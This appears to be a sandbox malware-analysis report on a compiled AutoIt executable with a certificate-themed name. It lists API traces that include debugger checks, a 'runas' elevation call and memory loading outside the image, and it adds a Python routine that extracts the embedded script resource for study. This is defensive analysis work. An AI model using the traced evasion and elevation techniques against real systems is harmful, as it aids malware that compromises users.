CreateFileW 94695->94697 94699 867bda __set_osfhnd 47 API calls 
94696->94699 94716 87603a 94696->94716 94698 876366 94697->94698 94701 8761f6 94698->94701 94702 87636e GetLastError 94698->94702 94699->94711 94700 86ee0e 59 API calls __wsopen_helper 94700->94716 94701->94665 94703 867bed __dosmaperr 47 API calls 94702->94703 94705 87637a 94703->94705 94704 86f82f 49 API calls __lseeki64_nolock 94704->94716 94707 86ab1e __free_osfhnd 48 API calls 94705->94707 94706 86ea9c __close_nolock 50 API calls 94706->94716 94707->94701 94708 876f40 __chsize_nolock 81 API calls 94708->94716 94709 86af61 __flush 78 API calls 94709->94711 94710 86f82f 49 API calls __lseeki64_nolock 94710->94711 94711->94692 94711->94709 94711->94710 94711->94716 94712 8761e9 94714 86ea9c __close_nolock 50 API calls 94712->94714 94713 8761d2 94713->94692 94715 8761f0 94714->94715 94717 867c0e __mtinitlocknum 47 API calls 94715->94717 94716->94700 94716->94704 94716->94706 94716->94708 94716->94711 94716->94712 94716->94713 94717->94701 94718->94635 94719->94641 94720->94641 94725 8442f6 94721->94725 94724 8442cc LoadLibraryA GetProcAddress 94724->94481 94726 8442aa 94725->94726 94727 8442ff LoadLibraryA 94725->94727 94726->94481 94726->94724 94727->94726 94728 844310 GetProcAddress 94727->94728 94728->94726 94730 85f4ea 48 API calls 94729->94730 94731 8447c9 94730->94731 94731->94489 94733 844085 FindResourceExW 94732->94733 94737 8440a2 94732->94737 94734 8b4f16 LoadResource 94733->94734 94733->94737 94735 8b4f2b SizeofResource 94734->94735 94734->94737 94736 8b4f3f LockResource 94735->94736 94735->94737 94736->94737 94737->94490 94739 844526 94738->94739 94740 8b4fe0 94738->94740 94744 863a8d 94739->94744 94742 844534 94742->94501 94743->94490 94745 863a99 __mtinitlocknum 94744->94745 94746 863aa7 94745->94746 94747 863acd 94745->94747 94757 867c0e 47 API calls __getptd_noexit 94746->94757 94759 864e1c 94747->94759 94750 863aac 94758 866e10 8 API calls __vswprintf_l 94750->94758 94754 863ae2 94766 863b04 LeaveCriticalSection LeaveCriticalSection _fprintf 
94754->94766 94756 863ab7 __mtinitlocknum 94756->94742 94757->94750 94758->94756 94760 864e4e EnterCriticalSection 94759->94760 94761 864e2c 94759->94761 94764 863ad3 94760->94764 94761->94760 94762 864e34 94761->94762 94763 867cf4 __lock 47 API calls 94762->94763 94763->94764 94765 8639fe 81 API calls 3 library calls 94764->94765 94765->94754 94766->94756 94770 863839 94767->94770 94769 844510 94769->94509 94771 863845 __mtinitlocknum 94770->94771 94772 863880 __mtinitlocknum 94771->94772 94773 86385b _memset 94771->94773 94774 863888 94771->94774 94772->94769 94783 867c0e 47 API calls __getptd_noexit 94773->94783 94775 864e1c __lock_file 48 API calls 94774->94775 94776 86388e 94775->94776 94785 86365b 62 API calls 7 library calls 94776->94785 94779 863875 94784 866e10 8 API calls __vswprintf_l 94779->94784 94780 8638a4 94786 8638c2 LeaveCriticalSection LeaveCriticalSection _fprintf 94780->94786 94783->94779 94784->94772 94785->94780 94786->94772 94790 86344a GetSystemTimeAsFileTime 94787->94790 94789 88bdc3 94789->94511 94791 863478 __aulldiv 94790->94791 94791->94789 94793 863e71 __mtinitlocknum 94792->94793 94794 863e94 94793->94794 94795 863e7f 94793->94795 94797 864e1c __lock_file 48 API calls 94794->94797 94806 867c0e 47 API calls __getptd_noexit 94795->94806 94799 863e9a 94797->94799 94798 863e84 94807 866e10 8 API calls __vswprintf_l 94798->94807 94808 863b0c 55 API calls 6 library calls 94799->94808 94802 863ea5 94809 863ec5 LeaveCriticalSection LeaveCriticalSection _fprintf 94802->94809 94804 863eb7 94805 863e8f __mtinitlocknum 94804->94805 94805->94515 94806->94798 94807->94805 94808->94802 94809->94804 94811 861e61 94810->94811 94814 861e55 94810->94814 94834 867c0e 47 API calls __getptd_noexit 94811->94834 94813 862019 94818 861e41 94813->94818 94835 866e10 8 API calls __vswprintf_l 94813->94835 94814->94811 94821 861ed4 94814->94821 94829 869d6b 47 API calls 2 library calls 94814->94829 94817 861fa0 94817->94811 94817->94818 94822 861fb0 94817->94822 
94818->94349 94819 861f5f 94819->94811 94820 861f7b 94819->94820 94831 869d6b 47 API calls 2 library calls 94819->94831 94820->94811 94820->94818 94825 861f91 94820->94825 94821->94811 94828 861f41 94821->94828 94830 869d6b 47 API calls 2 library calls 94821->94830 94833 869d6b 47 API calls 2 library calls 94822->94833 94832 869d6b 47 API calls 2 library calls 94825->94832 94828->94817 94828->94819 94829->94821 94830->94828 94831->94820 94832->94818 94833->94818 94834->94813 94835->94818 94836->94447 94838 862aba __mtinitlocknum 94837->94838 94839 862ad4 94838->94839 94840 862aec 94838->94840 94841 862ae4 __mtinitlocknum 94838->94841 94915 867c0e 47 API calls __getptd_noexit 94839->94915 94842 864e1c __lock_file 48 API calls 94840->94842 94841->94458 94844 862af2 94842->94844 94903 862957 94844->94903 94845 862ad9 94916 866e10 8 API calls __vswprintf_l 94845->94916 94851 8635f0 __mtinitlocknum 94850->94851 94852 863604 94851->94852 94853 86361c 94851->94853 95093 867c0e 47 API calls __getptd_noexit 94852->95093 94856 864e1c __lock_file 48 API calls 94853->94856 94860 863614 __mtinitlocknum 94853->94860 94855 863609 95094 866e10 8 API calls __vswprintf_l 94855->95094 94857 86362e 94856->94857 95077 863578 94857->95077 94860->94451 94864 88c6ff SetFileTime CloseHandle 94863->94864 94865 88c715 94863->94865 94864->94865 94865->94429 94871 88c581 __tzset_nolock _wcscmp 94866->94871 94867 88c05f 94867->94426 94867->94429 94868 8444ed 64 API calls 94868->94871 94869 88bf5a GetSystemTimeAsFileTime 94869->94871 94870 844517 83 API calls 94870->94871 94871->94867 94871->94868 94871->94869 94871->94870 94873 88b97e 94872->94873 94874 88b970 94872->94874 94876 88b9c3 94873->94876 94877 863499 117 API calls 94873->94877 94898 88b987 94873->94898 94875 863499 117 API calls 94874->94875 94875->94873 95167 88bbe8 64 API calls 3 library calls 94876->95167 94879 88b9a8 94877->94879 94879->94876 94881 88b9b1 94879->94881 94880 88ba07 94882 88ba0b 94880->94882 94883 88ba2c 
94880->94883 94885 8635e4 __fcloseall 83 API calls 94881->94885 94881->94898 94884 88ba18 94882->94884 94887 8635e4 __fcloseall 83 API calls 94882->94887 95168 88b7e5 47 API calls __crtCompareStringA_stat 94883->95168 94889 8635e4 __fcloseall 83 API calls 94884->94889 94884->94898 94885->94898 94887->94884 94888 88ba34 94890 88ba5a 94888->94890 94891 88ba3a 94888->94891 94889->94898 95169 88ba8a 90 API calls 94890->95169 94893 88ba47 94891->94893 94894 8635e4 __fcloseall 83 API calls 94891->94894 94896 8635e4 __fcloseall 83 API calls 94893->94896 94893->94898 94894->94893 94895 88ba61 95170 88bb64 94895->95170 94896->94898 94898->94457 94898->94464 94900 8635e4 __fcloseall 83 API calls 94902 88ba75 94900->94902 94901 8635e4 __fcloseall 83 API calls 94901->94898 94902->94898 94902->94901 94904 862966 94903->94904 94910 862984 94903->94910 94905 862974 94904->94905 94904->94910 94913 86299c ___crtGetEnvironmentStringsW 94904->94913 94950 867c0e 47 API calls __getptd_noexit 94905->94950 94907 862979 94951 866e10 8 API calls __vswprintf_l 94907->94951 94917 862b24 LeaveCriticalSection LeaveCriticalSection _fprintf 94910->94917 94913->94910 94918 862933 94913->94918 94925 86af61 94913->94925 94952 862c84 94913->94952 94958 868e63 78 API calls 6 library calls 94913->94958 94915->94845 94916->94841 94917->94841 94919 862952 94918->94919 94920 86293d 94918->94920 94919->94913 94959 867c0e 47 API calls __getptd_noexit 94920->94959 94922 862942 94960 866e10 8 API calls __vswprintf_l 94922->94960 94924 86294d 94924->94913 94926 86af6d __mtinitlocknum 94925->94926 94927 86af75 94926->94927 94928 86af8d 94926->94928 95034 867bda 47 API calls __getptd_noexit 94927->95034 94929 86b022 94928->94929 94933 86afbf 94928->94933 95039 867bda 47 API calls __getptd_noexit 94929->95039 94932 86af7a 95035 867c0e 47 API calls __getptd_noexit 94932->95035 94961 86a8ed 94933->94961 94934 86b027 95040 867c0e 47 API calls __getptd_noexit 94934->95040 94938 86afc5 94940 86afeb 94938->94940 94941 
86afd8 94938->94941 94939 86b02f 95041 866e10 8 API calls __vswprintf_l 94939->95041 95036 867c0e 47 API calls __getptd_noexit 94940->95036 94970 86b043 94941->94970 94943 86af82 __mtinitlocknum 94943->94913 94946 86afe4 95038 86b01a LeaveCriticalSection __unlock_fhandle 94946->95038 94947 86aff0 95037 867bda 47 API calls __getptd_noexit 94947->95037 94950->94907 94951->94910 94953 862c97 94952->94953 94957 862cbb 94952->94957 94954 862933 __flush 47 API calls 94953->94954 94953->94957 94955 862cb4 94954->94955 94956 86af61 __flush 78 API calls 94955->94956 94956->94957 94957->94913 94958->94913 94959->94922 94960->94924 94962 86a8f9 __mtinitlocknum 94961->94962 94963 86a946 EnterCriticalSection 94962->94963 94964 867cf4 __lock 47 API calls 94962->94964 94965 86a96c __mtinitlocknum 94963->94965 94966 86a91d 94964->94966 94965->94938 94967 86a93a 94966->94967 94968 86a928 InitializeCriticalSectionAndSpinCount 94966->94968 95042 86a970 LeaveCriticalSection _doexit 94967->95042 94968->94967 94971 86b050 __ftell_nolock 94970->94971 94972 86b0ac 94971->94972 94973 86b08d 94971->94973 95004 86b082 94971->95004 94978 86b105 94972->94978 94979 86b0e9 94972->94979 95052 867bda 47 API calls __getptd_noexit 94973->95052 94976 86b86b 94976->94946 94977 86b092 95053 867c0e 47 API calls __getptd_noexit 94977->95053 94981 86b11c 94978->94981 95058 86f82f 49 API calls 3 library calls 94978->95058 95055 867bda 47 API calls __getptd_noexit 94979->95055 95043 873bf2 94981->95043 94983 86b099 95054 866e10 8 API calls __vswprintf_l 94983->95054 94986 86b0ee 95056 867c0e 47 API calls __getptd_noexit 94986->95056 94990 86b0f5 95066 86a70c 95004->95066 95034->94932 95035->94943 95036->94947 95037->94946 95038->94943 95039->94934 95040->94939 95041->94943 95042->94963 95044 873bfd 95043->95044 95045 873c0a 95043->95045 95073 867c0e 47 API calls __getptd_noexit 95044->95073 95048 873c16 95045->95048 95074 867c0e 47 API calls __getptd_noexit 95045->95074 95047 873c02 95050 873c37 
[Execution graph for the 0x840000 image (the AutoIt runtime), flattened from the rendered graph. The numeric node IDs and edge lists carry no information in text form and are omitted; what the graph names is listed here by address range:]
• CRT internals (0x861xxx-0x873xxx): __getptd_noexit, __flush, _free, _fprintf, __vswprintf_l, ___lock_fhandle / __unlock_fhandle, __lseeki64_nolock, __calloc_crt, __mtinitlocknum, __cinit, __initterm_e, __wwincmdln, GetStartupInfoW, GetProcessHeap, GetCommandLineW, GetEnvironmentStringsW / FreeEnvironmentStringsW, GetModuleFileNameW, InitializeCriticalSectionAndSpinCount, TlsAlloc / TlsSetValue, GetCurrentThreadId, GetStdHandle, GetFileType, RtlAllocateHeap, IsProcessorFeaturePresent, and the __call_reportfault path (IsDebuggerPresent at 0x866cef, SetUnhandledExceptionFilter / UnhandledExceptionFilter at 0x8681ac, GetCurrentProcess / TerminateProcess at 0x868197).
• Message loop and child-process wait (0x84e8f6 onward and 0x8b5xxx): PeekMessageW, GetMessageW, TranslateMessage / DispatchMessageW, LockWindowUpdate, DestroyWindow, timeGetTime, Sleep, WaitForSingleObject, GetExitCodeProcess, CloseHandle; TranslateAcceleratorW (0x8bdf59), IsDialogMessageW (0x85dc96), GetClassLongW (0x8bdd1d), InterlockedDecrement (0x8797ed); a timing routine at 0x887a58 (QueryPerformanceCounter, QueryPerformanceFrequency, Sleep).
• Environment probing (0x85ddd7-0x85e038): GetVersionExW, GetCurrentProcess, LoadLibraryA / GetProcAddress / FreeLibrary, GetSystemInfo, GetNativeSystemInfo.
• Registry and path helpers: RegOpenKeyExW / RegQueryValueExW / RegCloseKey (0x85d2ac and 0x844a0a / 0x8b41cc), GetModuleFileNameW (0x845381), GetFullPathNameW (0x84661c, 0x84366c), GetLongPathNameW (0x8440b4), GetOpenFileNameW (0x8b372a), CharUpperBuffW (0x84bd47), GetSystemTimeAsFileTime (0x88bf5a).
• Stub startup (0x843a0f): IsThemeActive, SystemParametersInfoW; the function at 0x843d19 calls GetCurrentDirectoryW, then IsDebuggerPresent (0x843d57) with MessageBoxA (0x8b1cc1) on one branch, then SetCurrentDirectoryW.
• Nodes at 0xeb0168-0xeb10a2, outside the 0x840000-0x904000 range of the image dumps listed under Memory Dump Source: GetPEB, CreateFileW, VirtualAlloc, ReadFile, a second VirtualAlloc, CloseHandle, VirtualFree.

                                                                                Control-flow Graph

                                                                                [Control-flow graph for the function at 0x86b043; the Executed / Not Executed colouring of the rendered graph is not recoverable in text. Basic blocks span 0x86b043-0x86b86c. Internal calls: 0x86f8a0, 0x867bda, 0x867c0e, 0x866e10 (error path), 0x86f82f, 0x873bf2, 0x867a0d, 0x861688, 0x8740f7, 0x875884, 0x867bed, 0x86a70c. APIs: GetConsoleMode, GetConsoleCP, WideCharToMultiByte, WriteFile, GetLastError. The shape (console-mode check, code-page conversion, chunked WriteFile with GetLastError on failure) is consistent with the CRT's file-write path behind the __flush / _fprintf nodes of the execution graph above.]
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: (none)
                                                                                • String ID: (none)
                                                                                • API String ID: (none)
                                                                                • Opcode ID: bd7c2a650fe2e8bfecc8169422f7d0d61976d560a847f8f404ddcb4a2418d71d
                                                                                • Instruction ID: 078125d352442d48d8db5ab5ee5832d8841265c6655371875864c92220d41e62
                                                                                • Opcode Fuzzy Hash: bd7c2a650fe2e8bfecc8169422f7d0d61976d560a847f8f404ddcb4a2418d71d
                                                                                • Instruction Fuzzy Hash: EB324E75A122288FDB249F18DC81AE9B7B5FF46318F1940E9E40AE7A51D7309EC1CF52

                                                                                Control-flow Graph

APIs
• GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00843AA3,?), ref: 00843D45
• IsDebuggerPresent.KERNEL32(?,?,?,?,00843AA3,?), ref: 00843D57
• GetFullPathNameW.KERNEL32(00007FFF,?,?,00901148,00901130,?,?,?,?,00843AA3,?), ref: 00843DC8
  • Part of subcall function 00846430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00843DEE,00901148,?,?,?,?,?,00843AA3,?), ref: 00846471
• SetCurrentDirectoryW.KERNEL32(?,?,?,00843AA3,?), ref: 00843E48
• MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,008F28F4,00000010), ref: 008B1CCE
• SetCurrentDirectoryW.KERNEL32(?,00901148,?,?,?,?,?,00843AA3,?), ref: 008B1D06
• GetForegroundWindow.USER32(runas,?,?,?,00000001,?,008DDAB4,00901148,?,?,?,?,?,00843AA3,?), ref: 008B1D89
• ShellExecuteW.SHELL32(00000000,?,?,?,?,00843AA3), ref: 008B1D90
  • Part of subcall function 00843E6E: GetSysColorBrush.USER32(0000000F), ref: 00843E79
  • Part of subcall function 00843E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00843E88
  • Part of subcall function 00843E6E: LoadIconW.USER32(00000063), ref: 00843E9E
  • Part of subcall function 00843E6E: LoadIconW.USER32(000000A4), ref: 00843EB0
  • Part of subcall function 00843E6E: LoadIconW.USER32(000000A2), ref: 00843EC2
  • Part of subcall function 00843E6E: RegisterClassExW.USER32(?), ref: 00843F30
  • Part of subcall function 008436B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 008436E6
  • Part of subcall function 008436B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00843707
  • Part of subcall function 008436B8: ShowWindow.USER32(00000000,?,?,?,?,00843AA3,?), ref: 0084371B
  • Part of subcall function 008436B8: ShowWindow.USER32(00000000,?,?,?,?,00843AA3,?), ref: 00843724
  • Part of subcall function 00844FFC: _memset.LIBCMT ref: 00845022
  • Part of subcall function 00844FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 008450CB
Strings
• runas, xrefs: 008B1D84
• This is a third-party compiled AutoIt script., xrefs: 008B1CC8
Memory Dump Source
• Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
Similarity
• API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
• String ID: This is a third-party compiled AutoIt script.$runas
• API String ID: 438480954-3287110873
• Opcode ID: ce367bee73f389619da55c16395ba5f3558a4a77e353c56cdb3b7c8518b1b6b0
• Instruction ID: 977a39257c88c6284757f8a8c6538a08ebfca841109d9c735ad3259f4aa758b3
• Opcode Fuzzy Hash: ce367bee73f389619da55c16395ba5f3558a4a77e353c56cdb3b7c8518b1b6b0
• Instruction Fuzzy Hash: 1D511530A0C34CAFCF11ABB8DC45EED7B79FF15704F004065F611E62A2DA7446499B22
Control-flow Graph: function 0085DDC0, basic blocks 0085DDC0-0085DF3B and 008B244E-008B24F8 (graph rendering and executed/not-executed colouring not preserved in the text export)
APIs
• GetVersionExW.KERNEL32(?), ref: 0085DDEC
• GetCurrentProcess.KERNEL32(00000000,008DDC38,?,?), ref: 0085DEAC
• GetNativeSystemInfo.KERNELBASE(?,008DDC38,?,?), ref: 0085DF01
• FreeLibrary.KERNEL32(00000000,?,?), ref: 0085DF0C
• FreeLibrary.KERNEL32(00000000,?,?), ref: 0085DF1F
• GetSystemInfo.KERNEL32(?,008DDC38,?,?), ref: 0085DF29
• GetSystemInfo.KERNEL32(?,008DDC38,?,?), ref: 0085DF35
Memory Dump Source
• Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
Similarity
• API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
• String ID:
• API String ID: 3851250370-0
• Opcode ID: 33990ce7e348d4682565e2c48f23e19fc00e798b1bf148a1b923f41ac982e116
• Instruction ID: 188c13fc7332c9b1e1a0e493ae566f9ff1c569802ec5de053c1ee6cfa21158c4
• Opcode Fuzzy Hash: 33990ce7e348d4682565e2c48f23e19fc00e798b1bf148a1b923f41ac982e116
• Instruction Fuzzy Hash: 37619FB180A388DBCF25DF6898C15E97FB4BF29305B1989D9DC45DF207C624890DCB6A
Control-flow Graph: function 0084406B, basic blocks 0084406B-008440A6 and 008B4F16-008B4F6E (graph rendering and executed/not-executed colouring not preserved in the text export)
APIs
• CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,0084449E,?,?,00000000,00000001), ref: 0084407B
• FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0084449E,?,?,00000000,00000001), ref: 00844092
• LoadResource.KERNEL32(?,00000000,?,?,0084449E,?,?,00000000,00000001,?,?,?,?,?,?,008441FB), ref: 008B4F1A
• SizeofResource.KERNEL32(?,00000000,?,?,0084449E,?,?,00000000,00000001,?,?,?,?,?,?,008441FB), ref: 008B4F2F
• LockResource.KERNEL32(0084449E,?,?,0084449E,?,?,00000000,00000001,?,?,?,?,?,?,008441FB,00000000), ref: 008B4F42
Memory Dump Source
• Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
Similarity
• API ID: Resource$CreateFindGlobalLoadLockSizeofStream
• String ID: SCRIPT
• API String ID: 3051347437-3967369404
• Opcode ID: 9b5a13c205fface46a3f7451093ba5edd0caab0d5717efe815a2d6ab37241aa2
• Instruction ID: 2453fa029e425b47c2d8ab6d3dc6f8312da64772a2151c4ff98dac543f812198
• Opcode Fuzzy Hash: 9b5a13c205fface46a3f7451093ba5edd0caab0d5717efe815a2d6ab37241aa2
• Instruction Fuzzy Hash: AC11FA71200705AFE7219B65EC49F67BBB9FBC5B51F14456CF612D62A0DAB1EC008A60
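The call sequence in this function (FindResourceExW with type 0000000A and the name SCRIPT, then LoadResource, SizeofResource and LockResource into a CreateStreamOnHGlobal stream) is how a compiled AutoIt stub locates its embedded script: an RT_RCDATA (type 10) resource named "SCRIPT". The code below is an added example, not code from this report, from Joe Sandbox or from AutoIt, that walks a PE resource directory and carves that resource out for offline analysis. It assumes the caller has already extracted the raw .rsrc section bytes and that section's virtual address from the PE section table (for example with a PE parser such as pefile); build_rsrc() only constructs test data so the walker can be exercised without a real sample, and the payload it returns is still in AutoIt's own compressed container, which this example does not decode.

```python
"""Carve the RT_RCDATA "SCRIPT" resource out of a PE .rsrc section.

Added example (not code from the report or from AutoIt). Input is the raw
.rsrc section bytes plus that section's RVA; build_rsrc() only constructs
test data so the walker can run without a real sample."""
import struct

RT_RCDATA = 10  # the 0000000A type passed to FindResourceExW in the trace


def _read_name(rsrc, name_field):
    """High bit set: offset (from the directory start) to a WORD-length-prefixed
    UTF-16LE string; otherwise the field is a numeric ID."""
    if name_field & 0x80000000:
        off = name_field & 0x7FFFFFFF
        (length,) = struct.unpack_from("<H", rsrc, off)
        return rsrc[off + 2:off + 2 + 2 * length].decode("utf-16-le")
    return name_field


def _entries(rsrc, dir_off):
    """Yield (name_or_id, offset_field) for each IMAGE_RESOURCE_DIRECTORY_ENTRY."""
    named, ids = struct.unpack_from("<HH", rsrc, dir_off + 12)
    for i in range(named + ids):
        name, off = struct.unpack_from("<II", rsrc, dir_off + 16 + 8 * i)
        yield _read_name(rsrc, name), off


def walk_resources(rsrc, section_rva):
    """Yield (type, name, lang, data) for every leaf of the type/name/lang tree.
    IMAGE_RESOURCE_DATA_ENTRY.OffsetToData is an RVA, hence section_rva."""
    for rtype, off1 in _entries(rsrc, 0):
        if not off1 & 0x80000000:
            continue  # type level must point at a subdirectory
        for name, off2 in _entries(rsrc, off1 & 0x7FFFFFFF):
            if not off2 & 0x80000000:
                continue
            for lang, off3 in _entries(rsrc, off2 & 0x7FFFFFFF):
                if off3 & 0x80000000:
                    continue  # leaf level must be a data entry
                data_rva, size = struct.unpack_from("<II", rsrc, off3)
                start = data_rva - section_rva
                if start < 0 or start + size > len(rsrc):
                    raise ValueError("resource data lies outside the .rsrc section")
                yield rtype, name, lang, rsrc[start:start + size]


def extract_autoit_script(rsrc, section_rva):
    """Return the raw RT_RCDATA/"SCRIPT" payload (still in AutoIt's own
    compressed container) or None when the binary carries no such resource."""
    for rtype, name, _lang, data in walk_resources(rsrc, section_rva):
        if rtype == RT_RCDATA and name == "SCRIPT":
            return data
    return None


def build_rsrc(section_rva, resources):
    """Constructed test data: lay out a .rsrc blob for (type_id, name, payload)
    triples with one language (0x409) per leaf. Not needed on a real sample."""
    by_type = {}
    for t, n, p in resources:
        by_type.setdefault(t, []).append((n, p))
    types = sorted(by_type)
    leaves = [(t, n, p) for t in types for n, p in by_type[t]]
    off = 16 + 8 * len(types)                       # root directory
    type_dir, leaf_dir, data_ent, name_off, data_off = {}, {}, {}, {}, {}
    for t in types:
        type_dir[t], off = off, off + 16 + 8 * len(by_type[t])
    for t, n, _ in leaves:
        leaf_dir[(t, n)], off = off, off + 24      # dir + one lang entry
    for t, n, _ in leaves:
        data_ent[(t, n)], off = off, off + 16
    for _, n, _ in leaves:
        if isinstance(n, str) and n not in name_off:
            name_off[n], off = off, off + 2 + 2 * len(n)
    off = (off + 7) & ~7
    for t, n, p in leaves:
        data_off[(t, n)], off = off, off + ((len(p) + 7) & ~7)
    buf = bytearray(off)

    def put_dir(at, entries):                       # entries: (name_field, offset_field)
        named = sum(1 for nf, _ in entries if nf & 0x80000000)
        struct.pack_into("<IIHHHH", buf, at, 0, 0, 0, 0, named, len(entries) - named)
        for i, (nf, of) in enumerate(entries):
            struct.pack_into("<II", buf, at + 16 + 8 * i, nf, of)

    put_dir(0, [(t, 0x80000000 | type_dir[t]) for t in types])
    for t in types:
        ents = [((0x80000000 | name_off[n]) if isinstance(n, str) else n,
                 0x80000000 | leaf_dir[(t, n)]) for n, _ in by_type[t]]
        put_dir(type_dir[t], sorted(ents, key=lambda e: not e[0] & 0x80000000))
    for t, n, p in leaves:
        put_dir(leaf_dir[(t, n)], [(0x409, data_ent[(t, n)])])
        struct.pack_into("<IIII", buf, data_ent[(t, n)],
                         section_rva + data_off[(t, n)], len(p), 0, 0)
        buf[data_off[(t, n)]:data_off[(t, n)] + len(p)] = p
    for n, o in name_off.items():
        struct.pack_into("<H", buf, o, len(n))
        buf[o + 2:o + 2 + 2 * len(n)] = n.encode("utf-16-le")
    return bytes(buf)
```

On a real sample, pass the .rsrc section's raw bytes and its VirtualAddress to extract_autoit_script(); the bounds check in walk_resources() matters because a packed or truncated dump can carry data entries whose RVA points outside the section, which would otherwise return garbage rather than fail.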
APIs
• GetFileAttributesW.KERNELBASE(?,008B2F49), ref: 00886CB9
• FindFirstFileW.KERNELBASE(?,?), ref: 00886CCA
• FindClose.KERNEL32(00000000), ref: 00886CDA
Memory Dump Source
• Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
Similarity
• API ID: FileFind$AttributesCloseFirst
• String ID:
• API String ID: 48322524-0
• Opcode ID: d5a311ed85c934b4b30b2b464c4297e9e0d4ee1ef535266bd5b865ed9001252a
• Instruction ID: c10e3a6060d1be7a5bb01f9bf42df8f67f133ec366c80c3ea117bc98a1d6b3f8
• Opcode Fuzzy Hash: d5a311ed85c934b4b30b2b464c4297e9e0d4ee1ef535266bd5b865ed9001252a
• Instruction Fuzzy Hash: DCE01A31814615AB82207738EC0D8AAB6ADFB06339F14472AF976C21E0EB709954869A
Memory Dump Source
• Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
Similarity
• API ID: Exception@8Throwstd::exception::exception
• String ID: @
• API String ID: 3728558374-2766056989
• Opcode ID: 12d857c23561370a7cc01678940d49c88d32d4c9e7e1559327d04a64d83bf181
• Instruction ID: 8aa060b05bc7d88a5488c8dc074a750081cdbbbd323b7a27003022c875f74243
• Opcode Fuzzy Hash: 12d857c23561370a7cc01678940d49c88d32d4c9e7e1559327d04a64d83bf181
